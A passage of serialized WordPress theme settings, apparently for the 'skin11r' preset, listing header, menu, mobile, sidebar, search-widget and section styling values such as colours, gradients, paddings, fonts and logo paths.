100%\";s:48:\"header-menu-decoration-other-active-line-opacity\";s:2:\"30\";s:43:\"header-menu-decoration-other-active-opacity\";s:2:\"15\";s:41:\"header-menu-decoration-other-active-style\";s:10:\"background\";s:42:\"header-menu-decoration-other-border-radius\";s:1:\"3\";s:40:\"header-menu-decoration-other-hover-color\";s:22:\"rgba(255,255,255,0.15)\";s:46:\"header-menu-decoration-other-hover-color-style\";s:6:\"accent\";s:43:\"header-menu-decoration-other-hover-gradient\";s:55:\"135deg|rgba(255,255,255,0.15) 30%|rgba(0,0,0,0.15) 100%\";s:39:\"header-menu-decoration-other-hover-line\";s:1:\"0\";s:45:\"header-menu-decoration-other-hover-line-color\";s:20:\"rgba(221,51,51,0.23)\";s:51:\"header-menu-decoration-other-hover-line-color-style\";s:8:\"gradient\";s:48:\"header-menu-decoration-other-hover-line-gradient\";s:55:\"135deg|rgba(255,255,255,0.23) 30%|rgba(0,0,0,0.23) 100%\";s:47:\"header-menu-decoration-other-hover-line-opacity\";s:2:\"23\";s:40:\"header-menu-decoration-other-hover-style\";s:10:\"background\";s:38:\"header-menu-decoration-other-line_size\";s:3:\"2px\";s:47:\"header-menu-decoration-other-links-is_justified\";s:1:\"0\";s:36:\"header-menu-decoration-other-opacity\";s:2:\"15\";s:28:\"header-menu-decoration-style\";s:9:\"underline\";s:38:\"header-menu-decoration-underline-color\";s:7:\"#1e73be\";s:44:\"header-menu-decoration-underline-color-style\";s:6:\"accent\";s:42:\"header-menu-decoration-underline-direction\";s:13:\"left_to_right\";s:41:\"header-menu-decoration-underline-gradient\";s:31:\"135deg|#ffffff 30%|#000000 100%\";s:42:\"header-menu-decoration-underline-line_size\";s:3:\"2px\";s:26:\"header-menu-dividers-color\";s:19:\"rgba(17,17,17,0.14)\";s:27:\"header-menu-dividers-height\";s:4:\"24px\";s:33:\"header-menu-dividers-height-style\";s:6:\"custom\";s:29:\"header-menu-dividers-surround\";s:1:\"0\";s:26:\"header-menu-dividers-width\";s:3:\"1px\";s:22:\"header-menu-font-color\";s:7:\"#ffffff\";s:28:\"header-menu-hover-font-color\";s:7:\"#ffffff\";s:34:\"header-menu-hover-font-color-style\";s:5:\"color\";s:31:\"header-menu-hover-font-gradient\";s:30:\"90deg|#8224e3 30%|#751257 100%\";s:21:\"header-menu-icon-size\";s:2:\"14\";s:23:\"header-menu-item-margin\";s:16:\"0px 0px 0px 30px\";s:24:\"header-menu-item-padding\";s:15:\"4px 4px 4px 4px\";s:47:\"header-menu-item-surround_margins-custom-margin\";s:4:\"50px\";s:39:\"header-menu-item-surround_margins-style\";s:7:\"regular\";s:25:\"header-menu-show_dividers\";s:1:\"0\";s:31:\"header-menu-show_next_lvl_icons\";b:0;s:35:\"header-menu-submenu-active-bg-color\";s:21:\"rgba(137,92,184,0.07)\";s:41:\"header-menu-submenu-active-bg-color-style\";s:6:\"accent\";s:38:\"header-menu-submenu-active-bg-gradient\";s:30:\"90deg|#81d742 30%|#eeee22 100%\";s:37:\"header-menu-submenu-active-bg-opacity\";s:1:\"7\";s:37:\"header-menu-submenu-active-font-color\";s:7:\"#ffffff\";s:43:\"header-menu-submenu-active-font-color-style\";s:6:\"accent\";s:40:\"header-menu-submenu-active-font-gradient\";s:30:\"90deg|#ffffff 30%|#000000 100%\";s:28:\"header-menu-submenu-bg-color\";s:19:\"rgba(255,255,255,1)\";s:28:\"header-menu-submenu-bg-hover\";s:10:\"background\";s:30:\"header-menu-submenu-bg-padding\";s:19:\"10px 10px 10px 10px\";s:28:\"header-menu-submenu-bg-width\";s:5:\"260px\";s:27:\"header-menu-submenu-display\";s:5:\"hover\";s:30:\"header-menu-submenu-font-color\";s:7:\"#3b3f4a\";s:34:\"header-menu-submenu-hover-bg-color\";s:21:\"rgba(137,92,184,0.07)\";s:40:\"header-menu-submenu-hover-bg-color-style\";s:6:\"accent\";s:37:\"header-menu-submenu-hover-bg-gradient\";s:30:\"90deg|#81d742 30%|#eeee22 100%\";s:36:\"header-menu-submenu-hover-bg-opacity\";s:1:\"7\";s:36:\"header-menu-submenu-hover-font-color\";s:7:\"#895cb8\";s:42:\"header-menu-submenu-hover-font-color-style\";s:6:\"accent\";s:39:\"header-menu-submenu-hover-font-gradient\";s:30:\"90deg|#81d742 30%|#eeee22 100%\";s:29:\"header-menu-submenu-icon-size\";s:2:\"14\";s:31:\"header-menu-submenu-item-margin\";s:15:\"0px 0px 0px 0px\";s:32:\"header-menu-submenu-item-padding\";s:17:\"8px 10px 8px 10px\";s:39:\"header-menu-submenu-parent_is_clickable\";b:0;s:39:\"header-menu-submenu-show_next_lvl_icons\";s:1:\"1\";s:39:\"header-menu-submenu-subtitle-typography\";a:2:{s:11:\"font_family\";s:15:\"Arial:400italic\";s:9:\"font_size\";s:2:\"10\";}s:30:\"header-menu-submenu-typography\";a:3:{s:11:\"font_family\";s:10:\"Roboto:500\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"13\";}s:31:\"header-menu-subtitle-typography\";a:2:{s:11:\"font_family\";s:15:\"Arial:400italic\";s:9:\"font_size\";s:2:\"11\";}s:22:\"header-menu-typography\";a:3:{s:11:\"font_family\";s:10:\"Roboto:700\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"16\";}s:25:\"header-menu_close_icon-bg\";s:7:\"enabled\";s:39:\"header-menu_close_icon-bg-border-radius\";s:3:\"0px\";s:38:\"header-menu_close_icon-bg-border-width\";s:3:\"0px\";s:31:\"header-menu_close_icon-bg-color\";s:22:\"rgba(255,255,255,0.75)\";s:31:\"header-menu_close_icon-bg-hover\";s:7:\"enabled\";s:29:\"header-menu_close_icon-border\";s:7:\"enabled\";s:35:\"header-menu_close_icon-border-color\";s:0:\"\";s:41:\"header-menu_close_icon-border-color-hover\";s:0:\"\";s:35:\"header-menu_close_icon-border-hover\";s:7:\"enabled\";s:36:\"header-menu_close_icon-caption_color\";s:7:\"#000000\";s:42:\"header-menu_close_icon-caption_color-hover\";s:7:\"#000000\";s:28:\"header-menu_close_icon-color\";s:7:\"#000000\";s:34:\"header-menu_close_icon-hover-color\";s:7:\"#000000\";s:29:\"header-menu_close_icon-margin\";s:19:\"30px 30px 30px 30px\";s:30:\"header-menu_close_icon-padding\";s:19:\"15px 15px 15px 15px\";s:19:\"header-menu_icon-bg\";s:7:\"enabled\";s:33:\"header-menu_icon-bg-border-radius\";s:3:\"0px\";s:32:\"header-menu_icon-bg-border-width\";s:3:\"0px\";s:25:\"header-menu_icon-bg-color\";s:22:\"rgba(255,255,255,0.75)\";s:31:\"header-menu_icon-bg-color-hover\";s:22:\"rgba(255,255,255,0.75)\";s:25:\"header-menu_icon-bg-hover\";s:7:\"enabled\";s:23:\"header-menu_icon-border\";s:7:\"enabled\";s:29:\"header-menu_icon-border-color\";s:0:\"\";s:29:\"header-menu_icon-border-hover\";s:7:\"enabled\";s:35:\"header-menu_icon-border-hover-color\";s:0:\"\";s:24:\"header-menu_icon-caption\";s:8:\"disabled\";s:32:\"header-menu_icon-caption-padding\";s:19:\"18px 15px 18px 15px\";s:29:\"header-menu_icon-caption-text\";s:4:\"Menu\";s:35:\"header-menu_icon-caption-typography\";a:3:{s:11:\"font_family\";s:6:\"Roboto\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"16\";}s:30:\"header-menu_icon-caption_color\";s:7:\"#000000\";s:36:\"header-menu_icon-caption_color-hover\";s:7:\"#000000\";s:28:\"header-menu_icon-caption_gap\";s:4:\"10px\";s:22:\"header-menu_icon-color\";s:7:\"#000000\";s:28:\"header-menu_icon-color-hover\";s:7:\"#000000\";s:25:\"header-menu_icon-elements\";a:0:{}s:44:\"header-menu_icon-elements-below_menu-padding\";s:15:\"0px 0px 0px 0px\";s:53:\"header-menu_icon-elements-near_menu-custom-icon-color\";s:0:\"\";s:52:\"header-menu_icon-elements-near_menu-custom-icon-size\";s:2:\"16\";s:46:\"header-menu_icon-elements-near_menu-font_color\";s:7:\"#888888\";s:46:\"header-menu_icon-elements-near_menu-typography\";a:2:{s:11:\"font_family\";s:5:\"Arial\";s:9:\"font_size\";s:2:\"14\";}s:31:\"header-menu_icon-hover-bg-color\";s:22:\"rgba(255,255,255,0.75)\";s:23:\"header-menu_icon-margin\";s:15:\"0px 0px 0px 0px\";s:30:\"header-menu_icon-show_elements\";s:1:\"0\";s:21:\"header-menu_icon-size\";s:6:\"medium\";s:21:\"header-mixed-bg-color\";s:19:\"rgba(255,255,255,1)\";s:23:\"header-mixed-decoration\";s:6:\"shadow\";s:29:\"header-mixed-decoration-color\";s:18:\"rgba(221,153,51,1)\";s:28:\"header-mixed-decoration_size\";s:3:\"1px\";s:29:\"header-mixed-floating-top-bar\";b:0;s:28:\"header-mixed-sticky-bg-color\";s:7:\"#000000\";s:29:\"header-mobile-content-padding\";s:19:\"45px 15px 30px 30px\";s:24:\"header-mobile-decoration\";s:6:\"shadow\";s:30:\"header-mobile-decoration-color\";s:7:\"#ffffff\";s:34:\"header-mobile-decoration-line_size\";s:3:\"1px\";s:32:\"header-mobile-first_switch-after\";s:5:\"800px\";s:33:\"header-mobile-first_switch-height\";s:4:\"50px\";s:33:\"header-mobile-first_switch-layout\";s:11:\"left_center\";s:31:\"header-mobile-first_switch-logo\";s:6:\"mobile\";s:39:\"header-mobile-first_switch-side-padding\";s:9:\"20px 20px\";s:31:\"header-mobile-floating-bg-color\";s:15:\"rgba(0,0,0,0.7)\";s:33:\"header-mobile-floating_navigation\";s:6:\"sticky\";s:29:\"header-mobile-header-bg-color\";s:15:\"rgba(0,0,0,0.7)\";s:24:\"header-mobile-menu-align\";s:4:\"left\";s:27:\"header-mobile-menu-bg-color\";s:19:\"rgba(255,255,255,1)\";s:27:\"header-mobile-menu-bg-width\";s:5:\"270px\";s:37:\"header-mobile-menu-close_icon-caption\";s:8:\"disabled\";s:42:\"header-mobile-menu-close_icon-caption-text\";s:4:\"Menu\";s:48:\"header-mobile-menu-close_icon-caption-typography\";a:3:{s:11:\"font_family\";s:6:\"Roboto\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"16\";}s:41:\"header-mobile-menu-close_icon-caption_gap\";s:4:\"10px\";s:38:\"header-mobile-menu-close_icon-position\";s:5:\"right\";s:34:\"header-mobile-menu-close_icon-size\";s:10:\"fade_small\";s:33:\"header-mobile-menu-dividers-color\";s:19:\"rgba(59,63,74,0.12)\";s:34:\"header-mobile-menu-dividers-height\";s:3:\"1px\";s:29:\"header-mobile-menu-font-color\";s:7:\"#3b3f4a\";s:35:\"header-mobile-menu-font-hover-color\";s:7:\"#3c3e45\";s:41:\"header-mobile-menu-font-hover-color-style\";s:6:\"accent\";s:38:\"header-mobile-menu-font-hover-gradient\";s:30:\"90deg|#b78ce2 30%|#1e73be 100%\";s:32:\"header-mobile-menu-show_dividers\";s:1:\"0\";s:29:\"header-mobile-menu-typography\";a:3:{s:11:\"font_family\";s:10:\"Roboto:700\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"16\";}s:38:\"header-mobile-menu_close-caption_color\";s:4:\"#fff\";s:44:\"header-mobile-menu_close-caption_color-hover\";s:4:\"#fff\";s:32:\"header-mobile-menu_close_icon-bg\";s:7:\"enabled\";s:46:\"header-mobile-menu_close_icon-bg-border-radius\";s:3:\"2px\";s:45:\"header-mobile-menu_close_icon-bg-border-width\";s:3:\"0px\";s:38:\"header-mobile-menu_close_icon-bg-color\";s:0:\"\";s:38:\"header-mobile-menu_close_icon-bg-hover\";s:7:\"enabled\";s:36:\"header-mobile-menu_close_icon-border\";s:8:\"disabled\";s:42:\"header-mobile-menu_close_icon-border-color\";s:0:\"\";s:48:\"header-mobile-menu_close_icon-border-color-hover\";s:0:\"\";s:42:\"header-mobile-menu_close_icon-border-hover\";s:8:\"disabled\";s:35:\"header-mobile-menu_close_icon-color\";s:4:\"#fff\";s:41:\"header-mobile-menu_close_icon-hover-color\";s:4:\"#fff\";s:36:\"header-mobile-menu_close_icon-margin\";s:16:\"15px 0px 0px 0px\";s:37:\"header-mobile-menu_close_icon-padding\";s:15:\"5px 5px 5px 5px\";s:40:\"header-mobile-menu_icon-bg-border-radius\";s:3:\"0px\";s:39:\"header-mobile-menu_icon-bg-border-width\";s:3:\"0px\";s:32:\"header-mobile-menu_icon-bg-color\";s:16:\"rgba(35,38,45,0)\";s:38:\"header-mobile-menu_icon-bg-color-hover\";s:16:\"rgba(35,38,45,0)\";s:33:\"header-mobile-menu_icon-bg-enable\";s:1:\"1\";s:32:\"header-mobile-menu_icon-bg-hover\";s:1:\"1\";s:30:\"header-mobile-menu_icon-border\";s:8:\"disabled\";s:36:\"header-mobile-menu_icon-border-color\";s:0:\"\";s:36:\"header-mobile-menu_icon-border-hover\";s:8:\"disabled\";s:42:\"header-mobile-menu_icon-border-hover-color\";s:0:\"\";s:31:\"header-mobile-menu_icon-caption\";s:8:\"disabled\";s:39:\"header-mobile-menu_icon-caption-padding\";s:15:\"4px 1px 4px 1px\";s:36:\"header-mobile-menu_icon-caption-text\";s:4:\"Menu\";s:42:\"header-mobile-menu_icon-caption-typography\";a:3:{s:11:\"font_family\";s:6:\"Roboto\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"16\";}s:37:\"header-mobile-menu_icon-caption_color\";s:7:\"#ffffff\";s:43:\"header-mobile-menu_icon-caption_color-hover\";s:7:\"#ffffff\";s:35:\"header-mobile-menu_icon-caption_gap\";s:4:\"10px\";s:29:\"header-mobile-menu_icon-color\";s:7:\"#ffffff\";s:35:\"header-mobile-menu_icon-color-hover\";s:7:\"#ffffff\";s:38:\"header-mobile-menu_icon-hover-bg-color\";s:0:\"\";s:30:\"header-mobile-menu_icon-margin\";s:15:\"0px 0px 0px 0px\";s:28:\"header-mobile-menu_icon-size\";s:6:\"type_1\";s:44:\"header-mobile-microwidgets-custom-icon-color\";s:0:\"\";s:43:\"header-mobile-microwidgets-custom-icon-size\";s:2:\"16\";s:37:\"header-mobile-microwidgets-font-color\";s:7:\"#ffffff\";s:37:\"header-mobile-microwidgets-typography\";a:2:{s:11:\"font_family\";s:10:\"Roboto:500\";s:9:\"font_size\";s:2:\"13\";}s:30:\"header-mobile-overlay-bg-color\";s:18:\"rgba(17,17,17,0.5)\";s:33:\"header-mobile-second_switch-after\";s:3:\"0px\";s:34:\"header-mobile-second_switch-height\";s:4:\"50px\";s:34:\"header-mobile-second_switch-layout\";s:10:\"right_left\";s:32:\"header-mobile-second_switch-logo\";s:6:\"mobile\";s:40:\"header-mobile-second_switch-side-padding\";s:9:\"20px 20px\";s:32:\"header-mobile-submenu-typography\";a:3:{s:11:\"font_family\";s:10:\"Roboto:500\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"13\";}s:30:\"header-overlay-content-padding\";s:15:\"0px 0px 0px 0px\";s:31:\"header-overlay-content-position\";s:6:\"center\";s:28:\"header-overlay-content-width\";s:5:\"300px\";s:28:\"header-overlay-logo-position\";s:12:\"fully_inside\";s:35:\"header-overlay-menu-items_alignment\";s:6:\"center\";s:30:\"header-overlay-menu-items_link\";s:9:\"fullwidth\";s:28:\"header-overlay-menu-position\";s:8:\"v_center\";s:31:\"header-show_floating_navigation\";s:1:\"1\";s:27:\"header-side-content-padding\";s:17:\"50px 0px 40px 0px\";s:20:\"header-side-elements\";a:1:{s:10:\"below_menu\";a:3:{i:0;s:12:\"social_icons\";i:1;s:5:\"email\";i:2;s:5:\"skype\";}}s:39:\"header-side-elements-below_menu-padding\";s:17:\"0px 35px 0px 35px\";s:48:\"header-side-elements-near_menu-custom-icon-color\";s:0:\"\";s:47:\"header-side-elements-near_menu-custom-icon-size\";s:2:\"16\";s:41:\"header-side-elements-near_menu-font_color\";s:7:\"#888888\";s:41:\"header-side-elements-near_menu-typography\";a:2:{s:11:\"font_family\";s:5:\"Arial\";s:9:\"font_size\";s:2:\"14\";}s:25:\"header-side-logo-position\";s:6:\"inside\";s:32:\"header-side-menu-items_alignment\";s:6:\"center\";s:27:\"header-side-menu-items_link\";s:9:\"fullwidth\";s:25:\"header-side-menu-position\";s:5:\"v_top\";s:33:\"header-side-menu-submenu-position\";s:4:\"down\";s:20:\"header-side-position\";s:5:\"right\";s:25:\"header-side-show_elements\";s:1:\"1\";s:17:\"header-side-width\";s:5:\"300px\";s:25:\"header-side_line-elements\";a:0:{}s:44:\"header-side_line-elements-below_menu-padding\";s:15:\"0px 0px 0px 0px\";s:53:\"header-side_line-elements-near_menu-custom-icon-color\";s:0:\"\";s:52:\"header-side_line-elements-near_menu-custom-icon-size\";s:2:\"16\";s:46:\"header-side_line-elements-near_menu-font_color\";s:7:\"#888888\";s:46:\"header-side_line-elements-near_menu-typography\";a:2:{s:11:\"font_family\";s:5:\"Arial\";s:9:\"font_size\";s:2:\"14\";}s:30:\"header-side_line-show_elements\";s:1:\"0\";s:22:\"header-side_line-width\";s:4:\"60px\";s:32:\"header-slide_out-content-padding\";s:17:\"50px 0px 50px 0px\";s:30:\"header-slide_out-logo-position\";s:12:\"fully_inside\";s:37:\"header-slide_out-menu-items_alignment\";s:6:\"center\";s:32:\"header-slide_out-menu-items_link\";s:9:\"fullwidth\";s:30:\"header-slide_out-menu-position\";s:5:\"v_top\";s:34:\"header-slide_out-overlay-animation\";s:4:\"fade\";s:33:\"header-slide_out-overlay-bg-color\";s:18:\"rgba(17,17,17,0.4)\";s:39:\"header-slide_out-overlay-bg-color-style\";s:5:\"color\";s:36:\"header-slide_out-overlay-bg-gradient\";s:58:\"135deg|rgba(205,183,226,0.4) 30%|rgba(130,20,130,0.4) 100%\";s:35:\"header-slide_out-overlay-bg-opacity\";s:2:\"40\";s:25:\"header-slide_out-position\";s:4:\"left\";s:22:\"header-slide_out-width\";s:5:\"400px\";s:21:\"header-split-elements\";a:1:{s:15:\"near_menu_right\";a:1:{i:0;s:9:\"text_area\";}}s:49:\"header-split-elements-near_menu-custom-icon-color\";s:0:\"\";s:48:\"header-split-elements-near_menu-custom-icon-size\";s:2:\"16\";s:42:\"header-split-elements-near_menu-font_color\";s:7:\"#888888\";s:42:\"header-split-elements-near_menu-typography\";a:2:{s:11:\"font_family\";s:5:\"Arial\";s:9:\"font_size\";s:2:\"14\";}s:44:\"header-split-elements-near_menu_left-padding\";s:17:\"0px 20px 0px 20px\";s:45:\"header-split-elements-near_menu_right-padding\";s:17:\"0px 50px 0px 20px\";s:19:\"header-split-height\";s:5:\"120px\";s:25:\"header-split-is_fullwidth\";s:1:\"1\";s:26:\"header-split-menu-position\";s:7:\"outside\";s:26:\"header-split-show_elements\";s:1:\"1\";s:25:\"header-split-side-padding\";s:9:\"30px 30px\";s:28:\"header-split-switch_paddings\";s:3:\"0px\";s:28:\"header-split_mobile_paddings\";s:7:\"0px 0px\";s:33:\"header-style-floating-choose_logo\";s:6:\"custom\";s:34:\"header-style-floating-logo-padding\";s:16:\"0px 0px 0px 30px\";s:29:\"header-style-floating-logo_hd\";a:2:{i:0;s:48:\"/wp-content/uploads/2016/11/logo-floating-hd.png\";i:1;i:1000;}s:34:\"header-style-floating-logo_regular\";a:2:{i:0;s:45:\"/wp-content/uploads/2016/11/logo-floating.png\";i:1;i:1001;}s:41:\"header-style-floating-mobile-logo-padding\";s:15:\"0px 0px 0px 0px\";s:36:\"header-style-floating-mobile-logo_hd\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:41:\"header-style-floating-mobile-logo_regular\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:31:\"header-style-mixed-logo-padding\";s:15:\"0px 0px 0px 0px\";s:26:\"header-style-mixed-logo_hd\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:31:\"header-style-mixed-logo_regular\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:48:\"header-style-mixed-top_line-floating-choose_logo\";s:4:\"main\";s:49:\"header-style-mixed-top_line-floating-logo-padding\";s:15:\"0px 0px 0px 0px\";s:44:\"header-style-mixed-top_line-floating-logo_hd\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:49:\"header-style-mixed-top_line-floating-logo_regular\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:51:\"header-style-mixed-transparent-top_line-choose_logo\";s:4:\"main\";s:52:\"header-style-mixed-transparent-top_line-logo-padding\";s:15:\"0px 0px 0px 0px\";s:47:\"header-style-mixed-transparent-top_line-logo_hd\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:52:\"header-style-mixed-transparent-top_line-logo_regular\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:32:\"header-style-mobile-logo-padding\";s:15:\"0px 0px 0px 0px\";s:27:\"header-style-mobile-logo_hd\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:32:\"header-style-mobile-logo_regular\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:36:\"header-style-transparent-choose_logo\";s:6:\"custom\";s:37:\"header-style-transparent-logo-padding\";s:15:\"0px 0px 0px 0px\";s:32:\"header-style-transparent-logo_hd\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:37:\"header-style-transparent-logo_regular\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:44:\"header-style-transparent-mobile-logo-padding\";s:15:\"0px 0px 0px 0px\";s:39:\"header-style-transparent-mobile-logo_hd\";a:2:{i:0;s:86:\"/inc/presets/images/full/skin11r.header-style-transparent-mobile-logo-hd.png?w=88&h=88\";i:1;i:0;}s:44:\"header-style-transparent-mobile-logo_regular\";a:2:{i:0;s:0:\"\";i:1;i:0;}s:24:\"header-top_line-elements\";a:0:{}s:43:\"header-top_line-elements-below_menu-padding\";s:15:\"0px 0px 0px 0px\";s:54:\"header-top_line-elements-in_top_line-custom-icon-color\";s:0:\"\";s:53:\"header-top_line-elements-in_top_line-custom-icon-size\";s:2:\"16\";s:47:\"header-top_line-elements-in_top_line-font_color\";s:7:\"#888888\";s:47:\"header-top_line-elements-in_top_line-typography\";a:2:{s:11:\"font_family\";s:5:\"Arial\";s:9:\"font_size\";s:2:\"14\";}s:52:\"header-top_line-elements-near_menu-custom-icon-color\";s:0:\"\";s:51:\"header-top_line-elements-near_menu-custom-icon-size\";s:2:\"16\";s:45:\"header-top_line-elements-near_menu-font_color\";s:7:\"#888888\";s:45:\"header-top_line-elements-near_menu-typography\";a:2:{s:11:\"font_family\";s:5:\"Arial\";s:9:\"font_size\";s:2:\"14\";}s:41:\"header-top_line-elements-top_line-padding\";s:15:\"0px 0px 0px 0px\";s:47:\"header-top_line-elements-top_line_right-padding\";s:15:\"0px 0px 0px 0px\";s:29:\"header-top_line-show_elements\";s:1:\"0\";s:28:\"header-top_line-side-padding\";s:9:\"30px 30px\";s:31:\"header-top_line-switch_paddings\";s:3:\"0px\";s:31:\"header-top_line_mobile_paddings\";s:7:\"0px 0px\";s:43:\"header-transparent-mobile-first_switch-logo\";s:6:\"mobile\";s:44:\"header-transparent-mobile-second_switch-logo\";s:6:\"mobile\";s:27:\"header-transparent_bg_color\";s:18:\"rgba(238,238,34,1)\";s:17:\"header_navigation\";s:9:\"slide_out\";s:17:\"image_hover-color\";s:22:\"rgba(255,255,255,0.25)\";s:26:\"image_hover-color_gradient\";s:58:\"135deg|rgba(46,221,237,0.25) 30%|rgba(0,132,187,0.25) 100%\";s:22:\"image_hover-color_mode\";s:5:\"color\";s:19:\"image_hover-opacity\";s:2:\"25\";s:34:\"image_hover-project_rollover_color\";s:16:\"rgba(0,0,0,0.85)\";s:43:\"image_hover-project_rollover_color_gradient\";s:58:\"135deg|rgba(46,221,237,0.85) 30%|rgba(0,132,187,0.85) 100%\";s:39:\"image_hover-project_rollover_color_mode\";s:6:\"accent\";s:36:\"image_hover-project_rollover_opacity\";s:2:\"85\";s:17:\"image_hover-style\";s:4:\"none\";s:14:\"input_bg_color\";s:19:\"rgba(253,253,253,1)\";s:18:\"input_border_color\";s:19:\"rgba(51,51,51,0.11)\";s:19:\"input_border_radius\";s:3:\"2px\";s:18:\"input_border_width\";s:15:\"1px 1px 1px 1px\";s:11:\"input_color\";s:7:\"#8b8d94\";s:12:\"input_height\";s:4:\"40px\";s:13:\"input_padding\";s:17:\"5px 15px 5px 15px\";s:25:\"layout-menu_icon-position\";s:15:\"menu_icon_right\";s:35:\"layout-menu_icon-show_floating_logo\";s:1:\"1\";s:22:\"layout-top_line-height\";s:5:\"130px\";s:28:\"layout-top_line-is_fullwidth\";s:1:\"0\";s:25:\"layout-top_line-is_sticky\";s:1:\"0\";s:29:\"layout-top_line-logo-position\";s:4:\"left\";s:42:\"menu-mobile-microwidgets-custom-icon-color\";s:0:\"\";s:41:\"menu-mobile-microwidgets-custom-icon-size\";s:2:\"16\";s:35:\"menu-mobile-microwidgets-font-color\";s:7:\"#3b3f4a\";s:35:\"menu-mobile-microwidgets-typography\";a:2:{s:11:\"font_family\";s:10:\"Roboto:500\";s:9:\"font_size\";s:2:\"13\";}s:16:\"message_bg_color\";s:0:\"\";s:13:\"message_color\";s:7:\"#ffffff\";s:32:\"microwidgets-search-active-width\";s:5:\"200px\";s:26:\"microwidgets-search-height\";s:4:\"34px\";s:30:\"microwidgets-search-typography\";a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:9:\"font_size\";s:2:\"14\";}s:25:\"microwidgets-search-width\";s:5:\"200px\";s:35:\"microwidgets-search_bg-border-color\";s:7:\"#e2e2e2\";s:28:\"microwidgets-search_bg-color\";s:7:\"#f4f4f4\";s:36:\"microwidgets-search_bg_border_radius\";s:3:\"0px\";s:35:\"microwidgets-search_bg_border_width\";s:3:\"0px\";s:31:\"microwidgets-search_custom-icon\";s:24:\"the7-mw-icon-search-bold\";s:30:\"microwidgets-search_font-color\";s:7:\"#aaaaaa\";s:24:\"microwidgets-search_icon\";s:6:\"custom\";s:29:\"microwidgets-search_icon-size\";s:2:\"16\";s:33:\"microwidgets-search_input-padding\";s:9:\"12px 12px\";s:30:\"microwidgets-search_overlay-bg\";s:5:\"color\";s:36:\"microwidgets-search_overlay-bg-color\";s:15:\"rgba(0,0,0,0.9)\";s:39:\"microwidgets-search_overlay-bg-gradient\";s:31:\"135deg|#ffffff 30%|#000000 100%\";s:25:\"microwidgets-search_style\";s:5:\"popup\";s:52:\"page_title-background-style-transparent-color_scheme\";s:5:\"light\";s:18:\"page_title-padding\";s:8:\"15px 0px\";s:30:\"portfolio-rel_projects_columns\";a:6:{s:12:\"wide_desktop\";i:4;s:7:\"desktop\";i:3;s:6:\"laptop\";i:3;s:8:\"h_tablet\";i:3;s:8:\"v_tablet\";i:2;s:5:\"phone\";i:1;}s:34:\"portfolio-rel_projects_proportions\";a:2:{s:5:\"width\";i:1;s:6:\"height\";i:1;}s:26:\"post-show_fancy_categories\";s:1:\"1\";s:20:\"post-show_fancy_date\";s:1:\"1\";s:6:\"preset\";s:7:\"skin11r\";s:33:\"show_static_part_of_archive_title\";s:1:\"1\";s:16:\"sidebar-bg_color\";s:19:\"rgba(247,247,248,1)\";s:16:\"sidebar-bg_image\";a:4:{s:5:\"image\";s:0:\"\";s:6:\"repeat\";s:6:\"repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:6:\"center\";}s:18:\"sidebar-decoration\";s:4:\"none\";s:32:\"sidebar-decoration_outline_color\";s:16:\"rgba(0,0,0,0.06)\";s:27:\"sidebar-distance_to_content\";s:4:\"50px\";s:26:\"sidebar-divider-horizontal\";s:1:\"0\";s:24:\"sidebar-divider-vertical\";s:1:\"1\";s:16:\"sidebar-floating\";b:0;s:21:\"sidebar-headers_color\";s:7:\"#292e36\";s:26:\"sidebar-primary_text_color\";s:7:\"#787d85\";s:22:\"sidebar-responsiveness\";s:5:\"970px\";s:25:\"sidebar-vertical_distance\";s:4:\"60px\";s:20:\"sidebar-visual_style\";s:13:\"with_dividers\";s:13:\"sidebar-width\";s:3:\"33%\";s:19:\"social_buttons-page\";a:0:{}s:32:\"social_buttons-page-button_title\";s:15:\"Share this page\";s:20:\"social_buttons-photo\";a:0:{}s:33:\"social_buttons-photo-button_title\";s:16:\"Share this image\";s:29:\"social_buttons-portfolio_post\";a:0:{}s:42:\"social_buttons-portfolio_post-button_title\";s:15:\"Share this post\";s:19:\"social_buttons-post\";a:0:{}s:32:\"social_buttons-post-button_title\";s:15:\"Share this post\";s:25:\"social_buttons-visibility\";s:7:\"allways\";s:25:\"stripes-stripe_1_bg_image\";a:4:{s:5:\"image\";s:0:\"\";s:6:\"repeat\";s:6:\"repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:6:\"center\";}s:22:\"stripes-stripe_1_color\";s:7:\"#f8f8f9\";s:39:\"stripes-stripe_1_content_boxes_bg_color\";s:7:\"#ffffff\";s:41:\"stripes-stripe_1_content_boxes_bg_opacity\";s:3:\"100\";s:41:\"stripes-stripe_1_content_boxes_decoration\";s:4:\"none\";s:55:\"stripes-stripe_1_content_boxes_decoration_outline_color\";s:7:\"#dd3333\";s:57:\"stripes-stripe_1_content_boxes_decoration_outline_opacity\";s:3:\"100\";s:30:\"stripes-stripe_1_headers_color\";s:7:\"#3b3f4a\";s:24:\"stripes-stripe_1_outline\";s:4:\"hide\";s:30:\"stripes-stripe_1_outline_color\";s:7:\"#44bb70\";s:32:\"stripes-stripe_1_outline_opacity\";s:3:\"100\";s:27:\"stripes-stripe_1_text_color\";s:7:\"#787d85\";s:25:\"stripes-stripe_2_bg_image\";a:4:{s:5:\"image\";s:0:\"\";s:6:\"repeat\";s:6:\"repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:6:\"center\";}s:22:\"stripes-stripe_2_color\";s:7:\"#23262d\";s:39:\"stripes-stripe_2_content_boxes_bg_color\";s:7:\"#ffffff\";s:41:\"stripes-stripe_2_content_boxes_bg_opacity\";s: